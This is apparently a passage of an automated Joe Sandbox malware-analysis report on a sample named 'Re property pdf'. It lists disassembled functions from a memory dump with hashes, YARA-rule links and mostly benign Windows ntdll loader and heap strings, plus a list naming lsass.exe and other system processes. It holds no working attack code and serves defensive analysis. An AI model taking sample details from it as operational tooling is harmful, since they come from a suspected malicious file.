                                                                                                                              • Opcode Fuzzy Hash: 66c3c782ca13dc6f6b60b59b9f6541b63b2c8091eff91e63e56810ab406748d8
                                                                                                                              • Instruction Fuzzy Hash: A981BAB0E00398AFDB60CF99CC41BEEBBB9EB48B00F148159F548B7280D775A841DB64
                                                                                                                              Function 010329F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 010722E4
                                                                                                                              • RtlpResolveAssemblyStorageMapEntry, xrefs: 0107261F
                                                                                                                              • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 010725EB
                                                                                                                              • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 010724C0
                                                                                                                              • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01072498
                                                                                                                              • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01072602
                                                                                                                              • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01072624
                                                                                                                              • @, xrefs: 0107259B
                                                                                                                              • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01072506
                                                                                                                              • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01072409
                                                                                                                              • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01072412
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                              • API String ID: 0-4009184096
                                                                                                                              • Opcode ID: 383575bccfac962db39dcbb443dba11c389a587834b8388158c3387a65414cad
                                                                                                                              • Instruction ID: 47e0d468ab0261011f3f07bc32b1a605d455d3792c9ee33caa89e1c27ba85056
                                                                                                                              • Opcode Fuzzy Hash: 383575bccfac962db39dcbb443dba11c389a587834b8388158c3387a65414cad
                                                                                                                              • Instruction Fuzzy Hash: 89025FF1D0422D9FDB61DB54CC80BDEB7B8AB54314F0041EAA689A7241EB70AF84CF59
                                                                                                                              Function 010A8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                              • API String ID: 0-2515994595
                                                                                                                              • Opcode ID: 6a973bf4abe4da05054715cf41ecf2e535532f5f02edba13e9debb66be17dd2c
                                                                                                                              • Instruction ID: 9ffeb5435e17c57455dfe3325d1ad508edefeab3468364be5a55a1d7f3bc1cc0
                                                                                                                              • Opcode Fuzzy Hash: 6a973bf4abe4da05054715cf41ecf2e535532f5f02edba13e9debb66be17dd2c
                                                                                                                              • Instruction Fuzzy Hash: 0051C3B15083159BD325EF588848BABBBE8EF94341F948A1FA9D8C7281E770D504DBD2
                                                                                                                              Function 010B0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                              • API String ID: 0-1700792311
                                                                                                                              • Opcode ID: 308854517b263442df51b81905376401c5fc9bda98978c11ae1ccde1f75e221b
                                                                                                                              • Instruction ID: c4319daf2d0e788dba222889006c41788794edef6598b03d0f9efd67e536440b
                                                                                                                              • Opcode Fuzzy Hash: 308854517b263442df51b81905376401c5fc9bda98978c11ae1ccde1f75e221b
                                                                                                                              • Instruction Fuzzy Hash: 2AD1CC31500685DFDB26DF68C881AEEBBF1FF49700F188099F6859B666C739D981DB10
                                                                                                                              Function 010889B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • VerifierDlls, xrefs: 01088CBD
                                                                                                                              • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01088A67
                                                                                                                              • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01088A3D
                                                                                                                              • VerifierDebug, xrefs: 01088CA5
                                                                                                                              • HandleTraces, xrefs: 01088C8F
                                                                                                                              • AVRF: -*- final list of providers -*- , xrefs: 01088B8F
                                                                                                                              • VerifierFlags, xrefs: 01088C50
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                              • API String ID: 0-3223716464
                                                                                                                              • Opcode ID: adcfc0aed0b6c2d2d3955dd27657eeefa6aba6c38d157c47cc655271a4244194
                                                                                                                              • Instruction ID: 84630b4ec624c869d9a23a1f82c0e9fbd8139ed1f19669fe5b075dcd96e7e1fb
                                                                                                                              • Opcode Fuzzy Hash: adcfc0aed0b6c2d2d3955dd27657eeefa6aba6c38d157c47cc655271a4244194
                                                                                                                              • Instruction Fuzzy Hash: A9913571649716AFD321FF288C81F6A7BE4AB94714F84855EFAC0AB681C775EC00CB91
                                                                                                                              Function 0100EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                              • API String ID: 0-1109411897
                                                                                                                              • Opcode ID: 702100a6188e273c72a461bddb59b1fb6c9de8d3078d4605e7c5c73f252e778a
                                                                                                                              • Instruction ID: e60028a58cd287c9fb8110fe2e6e62c24d415e1655523e9112d9e8efcaa1e6d9
                                                                                                                              • Opcode Fuzzy Hash: 702100a6188e273c72a461bddb59b1fb6c9de8d3078d4605e7c5c73f252e778a
                                                                                                                              • Instruction Fuzzy Hash: 8FA23874A0562A8FEB75DF18C8887ADBBB5BF45304F1442E9D98DA7290DB319E85CF00
                                                                                                                              Function 010363FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                              • API String ID: 0-792281065
                                                                                                                              • Opcode ID: 3b5db39d554fe852067356f2eb55c78cba598998fcd7a4636e4b02e5af84a652
                                                                                                                              • Instruction ID: 6a2903d6b17ccf90a04d29b63f0f92e0876026d0b41b11b1e571512232a8996f
                                                                                                                              • Opcode Fuzzy Hash: 3b5db39d554fe852067356f2eb55c78cba598998fcd7a4636e4b02e5af84a652
                                                                                                                              • Instruction Fuzzy Hash: 7B914970F01315ABEB35EF18D845BAE7BE5BB80B24F04016DE5C0AB6C1DB769902C795
                                                                                                                              Function 00FF645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01059A01
                                                                                                                              • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 010599ED
                                                                                                                              • apphelp.dll, xrefs: 00FF6496
                                                                                                                              • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01059A2A
                                                                                                                              • LdrpInitShimEngine, xrefs: 010599F4, 01059A07, 01059A30
                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01059A11, 01059A3A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                              • API String ID: 0-204845295
                                                                                                                              • Opcode ID: 588cf0f34fc5e38527071ab7b281f0921fa92759582898a1bbf73308343cc591
                                                                                                                              • Instruction ID: 93f3b475c79da4410c9e7c8b90d2010d74b5eabb4c2129ed77ee3a18a5f10c3d
                                                                                                                              • Opcode Fuzzy Hash: 588cf0f34fc5e38527071ab7b281f0921fa92759582898a1bbf73308343cc591
                                                                                                                              • Instruction Fuzzy Hash: FB518F712083049BE761DF24C842BAB77E8FF84758F14051DFAC59B1A1EB35E904DBA2
                                                                                                                              Function 01032674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01072180
                                                                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01072178
                                                                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 010721BF
                                                                                                                              • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0107219F
                                                                                                                              • SXS: %s() passed the empty activation context, xrefs: 01072165
                                                                                                                              • RtlGetAssemblyStorageRoot, xrefs: 01072160, 0107219A, 010721BA
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                              • API String ID: 0-861424205
                                                                                                                              • Opcode ID: 78e60944b8d97306751f3bc666a914fdfc84a424606227f2eee12496702c13a6
                                                                                                                              • Instruction ID: 1a118630e4bb50c347d78e466b1b25c2bd5cc5379c2415fa7557c596022309e8
                                                                                                                              • Opcode Fuzzy Hash: 78e60944b8d97306751f3bc666a914fdfc84a424606227f2eee12496702c13a6
                                                                                                                              • Instruction Fuzzy Hash: 3131E77AF40355B7E7229A999C45F9E7BBCFBB4B90F050099BB84A7240D2709A00D7A1
                                                                                                                              Function 0103C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • LdrpInitializeProcess, xrefs: 0103C6C4
                                                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 01078181, 010781F5
                                                                                                                              • Loading import redirection DLL: '%wZ', xrefs: 01078170
                                                                                                                              • Unable to build import redirection Table, Status = 0x%x, xrefs: 010781E5
                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 0103C6C3
                                                                                                                              • LdrpInitializeImportRedirection, xrefs: 01078177, 010781EB
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                              • API String ID: 0-475462383
                                                                                                                              • Opcode ID: 2a916cfdaf059826f80ffc68e5bd6b4fad11c2eb6ffcccba7712359e5d6dd6a0
                                                                                                                              • Instruction ID: 283c4631676567b581a482a2f3d42b553c93a31fd198fe02c0cfbd4688f5612e
                                                                                                                              • Opcode Fuzzy Hash: 2a916cfdaf059826f80ffc68e5bd6b4fad11c2eb6ffcccba7712359e5d6dd6a0
                                                                                                                              • Instruction Fuzzy Hash: 073104717483469BD220EF28D94AE6A77E4EFD4B10F04059DF9C5AB291EA20ED04D7A2
                                                                                                                              Function 0104096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 01042DF0: LdrInitializeThunk.NTDLL ref: 01042DFA
                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01040BA3
                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01040BB6
                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01040D60
                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01040D74
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1404860816-0
                                                                                                                              • Opcode ID: dbef06d61ca8dcf879ce4d2c062209e64e2db6a85ce5b2b92fb1b5877ecb6441
                                                                                                                              • Instruction ID: fd6197a33d3c38698eeffb325a65609cf0504a47724caee1557ce330518c7d85
                                                                                                                              • Opcode Fuzzy Hash: dbef06d61ca8dcf879ce4d2c062209e64e2db6a85ce5b2b92fb1b5877ecb6441
                                                                                                                              • Instruction Fuzzy Hash: DC425BB1900715DFDB61CF68C880BEAB7F5BF04314F1485A9EA89EB245E770A984CF61
                                                                                                                              Function 0100A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                              • API String ID: 0-379654539
                                                                                                                              • Opcode ID: 8611d750f5bbdf22f2a13464b47917208c61453f4e1dbb53133cccd3626daf82
                                                                                                                              • Instruction ID: e6ce0390bd5e7843ab4efb5cbbd7163ed8a95b3c9ddf96bd7c1294e5abdaf0ce
                                                                                                                              • Opcode Fuzzy Hash: 8611d750f5bbdf22f2a13464b47917208c61453f4e1dbb53133cccd3626daf82
                                                                                                                              • Instruction Fuzzy Hash: 21C19F74608386CFE712DF68C440BAAB7E4FF84714F04496AF9D58B291E735CA49CB52
                                                                                                                              Function 01038402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0103855E
                                                                                                                              • LdrpInitializeProcess, xrefs: 01038422
                                                                                                                              • @, xrefs: 01038591
                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01038421
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                              • API String ID: 0-1918872054
                                                                                                                              • Opcode ID: 97c74bf7c3b7d7ecc6637e00dc2b93e08ddec52d3e88b1fc2b6b645dd3b36144
                                                                                                                              • Instruction ID: 635db71fa0b428cbae3b020d8fbb76f0d196e1e8b68c19ca396bb3816903a4bc
                                                                                                                              • Opcode Fuzzy Hash: 97c74bf7c3b7d7ecc6637e00dc2b93e08ddec52d3e88b1fc2b6b645dd3b36144
                                                                                                                              • Instruction Fuzzy Hash: 5C91AE71648345AFD721DF64CC80EABBAECBF88744F404A6EFAC496191E734D904CB52
                                                                                                                              Function 0103273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 010721D9, 010722B1
                                                                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 010722B6
                                                                                                                              • SXS: %s() passed the empty activation context, xrefs: 010721DE
                                                                                                                              • .Local, xrefs: 010328D8
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                              • API String ID: 0-1239276146
                                                                                                                              • Opcode ID: 779cd038bcc88341eb98d72b3b31ffc4746058b1ec137b6c26d2fb699c331dc3
                                                                                                                              • Instruction ID: 9fb01288b9907205fd4e4facea9c63b2394454cca50e1aa42feacc8c6aa49f4a
                                                                                                                              • Opcode Fuzzy Hash: 779cd038bcc88341eb98d72b3b31ffc4746058b1ec137b6c26d2fb699c331dc3
                                                                                                                              • Instruction Fuzzy Hash: E0A1D035D0022ADBDB24CF68DC84BA9B7B5BF98314F1541EAD988AB251D730DE81CF94
                                                                                                                              Function 010064AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01061028
                                                                                                                              • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01060FE5
                                                                                                                              • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0106106B
                                                                                                                              • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 010610AE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                              • API String ID: 0-1468400865
                                                                                                                              • Opcode ID: a6e77c53d66be635bc7429c030327598b1b9777c79ba7cc94cbea21b2f89f357
                                                                                                                              • Instruction ID: 4e43a4fe45726b1d3f0773839befca6483537d632de2695c3c5c72fb4cdb4422
                                                                                                                              • Opcode Fuzzy Hash: a6e77c53d66be635bc7429c030327598b1b9777c79ba7cc94cbea21b2f89f357
                                                                                                                              • Instruction Fuzzy Hash: 5C71F0B19043059FDB62EF14C884B9B7FE9AF54764F4004A8F9888B286D736D588CBD2
                                                                                                                              Function 0102245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • apphelp.dll, xrefs: 01022462
                                                                                                                              • LdrpDynamicShimModule, xrefs: 0106A998
                                                                                                                              • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0106A992
                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 0106A9A2
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                              • API String ID: 0-176724104
                                                                                                                              • Opcode ID: f9c98b0652c300e0c577ff98eee5360a9010297fe3022d67762f8da06f3668aa
                                                                                                                              • Instruction ID: 7376a25d23d35b824051683c7e11dec5080ac1f2e92e2fc00d0a8aeb785df146
                                                                                                                              • Opcode Fuzzy Hash: f9c98b0652c300e0c577ff98eee5360a9010297fe3022d67762f8da06f3668aa
                                                                                                                              • Instruction Fuzzy Hash: 4B312771B00201EBD731EF59D842AAEB7F9FB84B14F25005EE9C17B645CB759882CB90
                                                                                                                              Function 010129A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0101327D
                                                                                                                              • HEAP: , xrefs: 01013264
                                                                                                                              • HEAP[%wZ]: , xrefs: 01013255
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                              • API String ID: 0-617086771
                                                                                                                              • Opcode ID: efbdf1c6f04a488e45d1f94c16a1fe04f4013e8d91e852436cf8dab4c190435d
                                                                                                                              • Instruction ID: 18637d5e107193f860e98bcb2dc992a7d26fabdb280be11a9979b30d20765bcd
                                                                                                                              • Opcode Fuzzy Hash: efbdf1c6f04a488e45d1f94c16a1fe04f4013e8d91e852436cf8dab4c190435d
                                                                                                                              • Instruction Fuzzy Hash: F892DE71A04249DFDB25CFA8C4407AEBBF1FF48310F1884A9E989AB395D739A941CF50
                                                                                                                              Function 01010770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                              • API String ID: 0-4253913091
                                                                                                                              • Opcode ID: 8d8bef15216eeac2aa650328030972bf4e462b1f3013c05a0aa4145fbaaf2c61
                                                                                                                              • Instruction ID: b1848d0fc8255a0f08d1a6696cb1d5e923a44a71ec98b5e55dd686f7a0aea288
                                                                                                                              • Opcode Fuzzy Hash: 8d8bef15216eeac2aa650328030972bf4e462b1f3013c05a0aa4145fbaaf2c61
                                                                                                                              • Instruction Fuzzy Hash: EFF19D30600606DFEB25CF68C894BAAB7F5FF45704F1481A9E5D69B389D738E981CB90
                                                                                                                              Function 01026962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: $@
                                                                                                                              • API String ID: 0-1077428164
                                                                                                                              • Opcode ID: 2233aa13e123c26df054477899f7a69eee79dfa167dd6ab350e62b7e24387519
                                                                                                                              • Instruction ID: d27aa60250c9333e191400f0a3289aed5b021873c9b192906c8c3ff0f319f727
                                                                                                                              • Opcode Fuzzy Hash: 2233aa13e123c26df054477899f7a69eee79dfa167dd6ab350e62b7e24387519
                                                                                                                              • Instruction Fuzzy Hash: 62C28D716083619FEB65CF28C881BABBBE5BF98714F04896DF9C987241D735D804CB92
                                                                                                                              Function 00FFA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
